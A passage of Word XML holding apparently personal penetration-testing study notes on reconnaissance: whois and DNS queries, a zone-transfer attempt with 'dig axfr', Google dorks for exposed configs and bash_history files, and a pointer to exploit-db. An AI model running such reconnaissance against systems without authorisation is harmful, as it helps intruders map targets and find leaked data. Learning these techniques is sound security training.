      </w:r>
      <w:r w:rsidRPr="003B567C">
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
        </w:rPr>
        <w:t>WHOIS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WhoIs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0056619B">
        <w:t xml:space="preserve">can be used </w:t>
      </w:r>
      <w:r>
        <w:t>to find out who own the IP address, or even use it to find o</w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t>t who owns a particular Domain. It is possible to find out email addresses. Normally some tech email address or phone number as a contact.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Linux commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0056619B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>whois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0056619B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> =brighteyes.com</w:t>
      </w:r>
      <w:r w:rsidR="0056619B">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>-- will say who owns the domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0056619B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>whois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0056619B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> =bright</w:t>
      </w:r>
      <w:r w:rsidR="0056619B">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0056619B">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>-- will return results with a little details on who owns and domain with bright in it. Will normally stop at 50 entries.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">http://www.GeekTools.com can be used to run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0056619B">
        <w:t>whois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0056619B">
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a web browser</w:t>
      </w:r>
      <w:r w:rsidR="0056619B">
        <w:t xml:space="preserve"> session.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**DNS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Domain Name Service</w:t>
      </w:r>
      <w:r w:rsidR="0056619B">
        <w:t xml:space="preserve">. Used to associate IP with Domain names. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Different ways </w:t>
      </w:r>
      <w:r w:rsidR="0056619B">
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> extract information using DNS.</w:t>
      </w:r>
      <w:r w:rsidR="0056619B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Find out as much as possible about a target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="0056619B" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009E6000">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="003B567C" w:rsidRPr="009E6000">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>slookup</w:t>
      </w:r>
      <w:r w:rsidR="00C614AD">
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidRPr="0056619B">
        <w:t>a powerful network administration command-line tool, available for many of the popular computer operating sy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">stems for querying </w:t>
      </w:r>
      <w:r w:rsidRPr="0056619B">
        <w:t>DNS to obtain domain names or IP addresses, mapping or for any other specific DNS Records</w:t>
      </w:r>
      <w:r w:rsidR="00C614AD">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E6000" w:rsidRPr="009E6000" w:rsidRDefault="009E6000" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C614AD" w:rsidRDefault="00C614AD" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00C614AD">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>slookup</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">-- Using this on its own will provide your local DNS information and enter command line in to nslookup mode with the “&gt;” prompt. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C614AD" w:rsidRDefault="00C614AD" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C614AD">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C614AD">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> 8.8.8.8</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-- Look up the DNS information for an IP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C614AD">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>www.infiniteskills.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  --</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Provides IP information for the search criteria</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C614AD">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>set type=mx</w:t>
      </w:r>
      <w:r w:rsidR="00C614AD">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C614AD">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-- This will provide additional information. </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> will show mail exchange servers. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C614AD" w:rsidRDefault="00C614AD" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;set type=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ptr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-- This will search for a pointer record</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C614AD">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>infiniteskills.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="009E6000">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>set type=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E6000">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>soa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009E6000">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-- (Start of Authority record) can provide a lot of useful information, primary name server, mail address, default </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ttl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>packets</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00C614AD" w:rsidRDefault="00C614AD" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C614AD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidR="009E6000">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C614AD">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C614AD">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> www.infiniteskills.com</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-- will provide some basic no frills information about a web or domain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C614AD">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>dig</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C614AD">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> infiniteskills.com</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">-- This is an alternative way of doing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Can provide some extra information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C614AD">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>dig</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C614AD">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C614AD">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>axfr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C614AD">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> infiniteskills.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-- this probably won't work but always worth a try. Might provide a list of Domain names.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Finding out more information:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009E6000">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E6000">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> infiniteskills.com</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-- Use host to find an IP address</w:t>
      </w:r>
      <w:r w:rsidR="009E6000">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009E6000">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>whois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E6000">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> 172.16.8.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">-- find out who owns the IP address you've just discovered. This will provide the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>supernet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NetRange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009E6000">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009E6000">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>dig</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E6000">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> mx infiniteskills.com</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-- Use this to find out who handles the mail servers</w:t>
      </w:r>
      <w:r w:rsidR="009E6000">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Googlehacking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using very specific codes in </w:t>
      </w:r>
      <w:r w:rsidR="009E6000">
        <w:t>the Google search e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ngine to </w:t>
      </w:r>
      <w:r w:rsidR="009E6000">
        <w:t>try and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> find valuable information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="009E6000" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use of symbols such as " </w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:r>
        <w:t>and the</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> + or </w:t>
      </w:r>
      <w:r>
        <w:t>– in the search bar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E6000" w:rsidRDefault="009E6000" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Examples include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>filetype:config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>allintitle:sensitive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>allintitle:sensitive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>filetype:doc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>site:mil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>inurl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wwwroot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>intitle:apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ext:js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009E6000">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>-- JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>intext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="009E6000" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>These can be strung together and also include some additional code to make more detailed searches</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>intitle:error</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>intext:mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -forum -manual</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>"index of" + "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bash_history</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" -google</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/5.0 server at" -google</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">**www.exploit-db.com </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Google Dorks. </w:t>
      </w:r>
      <w:r w:rsidR="009E6000">
        <w:t>Definitely w</w:t>
      </w:r>
      <w:r>
        <w:t>orth having a look around</w:t>
      </w:r>
      <w:r w:rsidR="009E6000">
        <w:t xml:space="preserve"> and b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ecome familiar with it. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00263D34" w:rsidRDefault="009E6000" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009E6000">
        <w:t>The Exploit Database is a CVE compliant archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Our aim is to serve the most comprehensive collection of exploits gathered through direct submissions, mailing lists, as well as other public sources, and present them in a freely-available and easy-to-navigate database. The Exploit Database is a repository for exploits and proof-of-concepts rather than advisories, making it a valuable resource for those who need actionable data right away</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00263D34" w:rsidRDefault="00263D34" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Allows you to read exactly what the exploit is and its rating before attempting to run it. Ensure you meet all the criteria. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00263D34" w:rsidRPr="00263D34" w:rsidRDefault="00263D34" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00263D34">
